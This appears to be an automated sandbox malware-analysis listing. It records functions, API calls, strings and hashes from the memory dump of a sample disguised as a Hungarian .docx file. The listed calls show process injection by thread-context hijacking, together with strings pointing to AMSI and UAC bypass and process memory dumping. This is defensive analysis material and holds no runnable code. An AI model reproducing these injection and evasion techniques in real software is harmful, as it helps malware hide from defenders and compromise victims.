                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 029BABC6
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 029BABD8
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 029BABEA
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 029BABFC
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 029BAC0E
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 029BAC20
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 029BAC32
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 029BAC44
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 029BAC56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                  • API String ID: 667068680-597814768
                                                                                                                                                  • Opcode ID: f9a6069736499c7211a8a3e2e95a28282416fd725f14197a856f7b4aaedd4982
                                                                                                                                                  • Instruction ID: f5df8fad18a3d3dcad32f62fab1318f155fb02b8e44797d56e58e5e30aedf665
                                                                                                                                                  • Opcode Fuzzy Hash: f9a6069736499c7211a8a3e2e95a28282416fd725f14197a856f7b4aaedd4982
                                                                                                                                                  • Instruction Fuzzy Hash: 123101B0A803509FEF11EFBCDD95A69B3ACAF96701B040D61A801CF284EB74E915CF91
                                                                                                                                                  Function 029B8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  • GetThreadContext.KERNEL32(00000000,02A27424,ScanString,02A273A8,029BA93C,UacInitialize,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,UacInitialize,02A273A8), ref: 029B9602
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                    • Part of subcall function 029B7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 029B7DEC
                                                                                                                                                  • SetThreadContext.KERNEL32(00000000,02A27424,ScanBuffer,02A273A8,029BA93C,ScanString,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,00000000,-00000008,02A274FC,00000004,02A27500), ref: 029BA317
                                                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02A27424,ScanBuffer,02A273A8,029BA93C,ScanString,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,00000000,-00000008,02A274FC), ref: 029BA324
                                                                                                                                                    • Part of subcall function 029B894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize,02A273A8,029BA93C,UacScan), ref: 029B8960
                                                                                                                                                    • Part of subcall function 029B894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029B897A
                                                                                                                                                    • Part of subcall function 029B894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02A273A8,029BA587,ScanString,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,Initialize), ref: 029B89B6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                  • API String ID: 2624078988-51457883
                                                                                                                                                  • Opcode ID: 2961251d4da823e2a7f56fd9b6c2edb47fe538a23e9295293405e34b42e58906
                                                                                                                                                  • Instruction ID: 628e85ba06b9f49abf42573bb834942d1c93c84328dbe6f429002b4830538c39
                                                                                                                                                  • Opcode Fuzzy Hash: 2961251d4da823e2a7f56fd9b6c2edb47fe538a23e9295293405e34b42e58906
                                                                                                                                                  • Instruction Fuzzy Hash: 00E20A34A006589FDB12EB68DD90BCEB3BAFFC9700F5051A1A005AB254DB70EE569F91
                                                                                                                                                  Function 029B8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 029B89D0: FreeLibrary.KERNEL32(74B20000,00000000,00000000,00000000,00000000,02A2738C,Function_0000662C,00000004,02A2739C,02A2738C,05F5E103,00000040,02A273A0,74B20000,00000000,00000000), ref: 029B8AAA
                                                                                                                                                    • Part of subcall function 029B8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 029B8814
                                                                                                                                                  • GetThreadContext.KERNEL32(00000000,02A27424,ScanString,02A273A8,029BA93C,UacInitialize,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,ScanBuffer,02A273A8,029BA93C,UacInitialize,02A273A8), ref: 029B9602
                                                                                                                                                    • Part of subcall function 029B7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 029B7A9F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                                                  • API String ID: 4276370345-51457883
                                                                                                                                                  • Opcode ID: 716a7620dfadcbf39cda5603409a8eff306c934198cb127c6c9c87d7345b7f89
                                                                                                                                                  • Instruction ID: 46c1a9cb107e2db7b939b6c574dcaa514e469e685bb462cd368d254f6ec9eb72
                                                                                                                                                  • Opcode Fuzzy Hash: 716a7620dfadcbf39cda5603409a8eff306c934198cb127c6c9c87d7345b7f89
                                                                                                                                                  • Instruction Fuzzy Hash: 8AE20934A006589FDB12EB68DD90BCEB3BAFFC9700F5051A1E005AB254DB70EE569F91
                                                                                                                                                  Function 029A5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5925
                                                                                                                                                  • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 029A593C
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?), ref: 029A596C
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A59D0
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A06
                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A19
                                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A2B
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000,029CE790), ref: 029A5A37
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C,029A0000), ref: 029A5A6B
                                                                                                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,029A737C), ref: 029A5A77
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 029A5A99
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                  • API String ID: 3245196872-1565342463
                                                                                                                                                  • Opcode ID: 662f5b951866b0430ebe2d6384c65726ed3dd444f23e826582502936842e4d58
                                                                                                                                                  • Instruction ID: 4fef65efb9521561bca01860535d32b2e26971dbf8cf6e791b86d2a34dc68999
                                                                                                                                                  • Opcode Fuzzy Hash: 662f5b951866b0430ebe2d6384c65726ed3dd444f23e826582502936842e4d58
                                                                                                                                                  • Instruction Fuzzy Hash: 9E417F71F00329AFDB20DAE8CC98ADEB3BDAF88344F4545A5E549E7241E730DA448F90
                                                                                                                                                  Function 029A5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 029A5BE8
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 029A5BF5
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 029A5BFB
                                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 029A5C26
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5C6D
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5C7D
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 029A5CA5
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 029A5CB5
                                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 029A5CDB
                                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 029A5CEB
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                                                  • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                  • Instruction ID: 2ffc2027f53f624d7d1d482dcecdba686fc3730f2fd1391b48f9c24a7e5263fb
                                                                                                                                                  • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                  • Instruction Fuzzy Hash: D1319371E4036C2AEF25D6B88C95FDE77BD9B44380F4501A1AA08E6185EB74DE888FD0
                                                                                                                                                  Function 029A7FD2 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 029A7FF5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                                  • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                  • Instruction ID: 06536fef386f474ab8478ba024374e09e90fdb0817f85d7da66c0a9556ad0cff
                                                                                                                                                  • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                                  • Instruction Fuzzy Hash: EA11C0B5E00209AFDB04DF99C981DBFF7F9FFC8300B54C569A505E7254E6719A018B90
                                                                                                                                                  Function 029AA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 029AA7E2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                  • Instruction ID: 91cd18fe1a71b44b77aadcffbc016db90af4ad35e209f1b38adb27f92e8576e5
                                                                                                                                                  • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                  • Instruction Fuzzy Hash: 40E0D871B0031417D715A55C9CA0EFAB26D9798310F00527ABD05C7385EEE09E808AE8
                                                                                                                                                  Function 029AB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetVersionExA.KERNEL32(?,029CD106,00000000,029CD11E), ref: 029AB79A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Version
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                                  • Opcode ID: 730f10992f5426ae62624140942aa53e6bbc2eb4c96dd47131dc725bae24d07e
                                                                                                                                                  • Instruction ID: 20e26d4181ab3bb168ac910a8b79daf12acada992146b89e7c967fc2fb00fd31
                                                                                                                                                  • Opcode Fuzzy Hash: 730f10992f5426ae62624140942aa53e6bbc2eb4c96dd47131dc725bae24d07e
                                                                                                                                                  • Instruction Fuzzy Hash: C7F012749483018FD340DF28D450A2A77E9FB88704F108D38EADAC7780E7789824CF92
                                                                                                                                                  Function 029AA810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,029ABE72,00000000,029AC08B,?,?,00000000,00000000), ref: 029AA823
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                  • Instruction ID: 9b67188e81b76efac6ee895612bad1d1c33a89649ded1525c9b095e492132848
                                                                                                                                                  • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                                                                                                  • Instruction Fuzzy Hash: 39D05EB630E3602AE214915E6D94D7B5AECCAC57A1F05443AB988C6101D2008C07DAF1
                                                                                                                                                  Function 029A920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                  • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                  • Instruction ID: e72db091c69c17d286227903419867d97fde1995c35f4c3aa5ed187b21bf7e95
                                                                                                                                                  • Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                                                                                                  • Instruction Fuzzy Hash: 86A0124440492041C940331C0C0253430445850A20FC8874068F8402D0F91D012080D3
                                                                                                                                                  Function 029A20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1782703707.00000000029A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029A0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1782687948.00000000029A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002A27000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1782919147.0000000002B1E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_29a0000_#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
